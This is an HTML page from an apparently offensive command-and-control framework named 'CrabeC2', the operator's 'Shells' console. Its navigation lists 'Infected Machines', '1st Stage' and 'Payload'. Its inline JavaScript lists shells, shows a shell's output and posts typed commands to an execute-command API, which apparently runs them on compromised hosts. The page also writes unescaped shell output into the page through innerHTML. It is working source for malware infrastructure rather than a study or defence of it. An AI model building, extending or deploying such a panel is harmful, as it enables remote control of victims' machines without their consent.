<!DOCTYPE html>
<html data-bs-theme="light" lang="en">

<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, shrink-to-fit=no">
    <title>Shells - CrabeC2</title>
    <link rel="stylesheet" href="assets/bootstrap/css/bootstrap.min.css">
    <link rel="stylesheet" href="assets/fonts/fontawesome-all.min.css">
    <link rel="stylesheet" href="assets/css/styles.min.css">
</head>

<body id="page-top">
    <div id="wrapper">
        <nav class="navbar align-items-start sidebar sidebar-dark accordion bg-gradient-primary p-0 navbar-dark">
            <div class="container-fluid d-flex flex-column p-0"><a class="navbar-brand d-flex justify-content-center align-items-center sidebar-brand m-0" href="#">
                    <div class="sidebar-brand-icon rotate-n-15"><i class="fas fa-pastafarianism" style="font-size: 37px;"></i></div>
                    <div class="sidebar-brand-text mx-3"><span>CrabeC2</span></div>
                </a>
                <hr class="sidebar-divider my-0">
                <ul class="navbar-nav text-light" id="accordionSidebar">
                    <li class="nav-item"><a class="nav-link" href="/"><i class="fas fa-tachometer-alt"></i><span>Dashboard</span></a></li>
                    <li class="nav-item"><a class="nav-link" href="init"><i class="fas fa-user"></i><span>1st Stage</span></a></li>
                    <li class="nav-item"><a class="nav-link" href="machines"><i class="fas fa-user"></i><span>Infected Machines</span></a></li>
                    <li class="nav-item"><a class="nav-link" href="payload"><i class="fas fa-table"></i><span>Payload</span></a></li>
                    <li class="nav-item"></li>
                    <li class="nav-item"><a class="nav-link" href="task-event"><i class="fas fa-window-maximize"></i><span>Task &amp; Event</span></a>
                    <li class="nav-item"><a class="nav-link" href="docs"><i class="fas fa-user-circle"></i><span>Documentation</span></a></li>
                    <li class="nav-item"></li>
                </ul>
                <div class="text-center d-none d-md-inline"><button class="btn rounded-circle border-0" id="sidebarToggle" type="button"></button></div>
            </div>
        </nav>
        <div class="d-flex flex-column" id="content-wrapper">
            <div id="content">
                <nav class="navbar navbar-expand bg-white shadow mb-4 topbar static-top navbar-light">
                    <div class="container-fluid"><button class="btn btn-link d-md-none rounded-circle me-3" id="sidebarToggleTop" type="button"><i class="fas fa-bars"></i></button>
                        <form class="d-none d-sm-inline-block me-auto ms-md-3 my-2 my-md-0 mw-100 navbar-search">
                        </form>
                        
                    </div>
                </nav>
                <div class="container-fluid">
                    <div class="text-center mt-5">
                        <select id="shell-list" onchange="fetchFileContent(this.value)">
   
                        </select>
                        <button class="btn btn-info btn-sm" onClick="fetchShell()">View</button>
                        <div id="shell-content" style="height: 300px; overflow-y: scroll;text-align: left;">
                        </div>
                        <div style="display: flex; justify-content: center; align-items: center;">
                            <input id="shell-cmd" class="bg-light form-control small" style="flex-grow: 1; margin-right: 10px;" type="text" placeholder="Send commands ...">
                            <button class="btn btn-info btn-sm" onClick="SendCommand()">Send</button>
                        </div>
                    </div>
                </div>
            </div>
            <footer class="bg-white sticky-footer">
                <div class="container my-auto">
                    <div class="text-center my-auto copyright"><span>Copyright © CrabeC2 2023</span></div>
                </div>
            </footer>
        </div><a class="border rounded d-inline scroll-to-top" href="#page-top"><i class="fas fa-angle-up"></i></a>
    </div>
    <script src="assets/bootstrap/js/bootstrap.min.js"></script>
    <script src="assets/js/script.min.js"></script>
    <script type="text/javascript">

        async function listFiles() {
            const response = await fetch('/api/shell/list_shell');
            const files = await response.json();
            const fileListElement = document.getElementById('shell-list');
            files.forEach(file => {
                const option = document.createElement('option');
                option.value = file;
                option.textContent = file;
                fileListElement.appendChild(option);
            });
        }

        async function fetchShell() {
            const list_shell = document.getElementById('shell-list');
            const shell_name = list_shell.value;
            if (!shell_name) return;
            const response = await fetch(`/api/shell/${shell_name}`);
            const content = await response.text();
            const formattedContent = content.replace(/\n/g, '<br>');
            document.getElementById('shell-content').innerHTML = formattedContent;
        }

        async function SendCommand()
        {
            const cmd_input = document.getElementById('shell-cmd');
            const cmd = cmd_input.value;
            if (!cmd) return;

            const response = await fetch('/api/execute_command', {
                method: 'POST',
                headers: {
                    'Content-Type': 'application/json'
                },
                body: JSON.stringify({ cmd: cmd })
            });

            const responseText = await response.text();
            cmd_input.value = '';
        }

        listFiles();



    </script>
</body>

</html>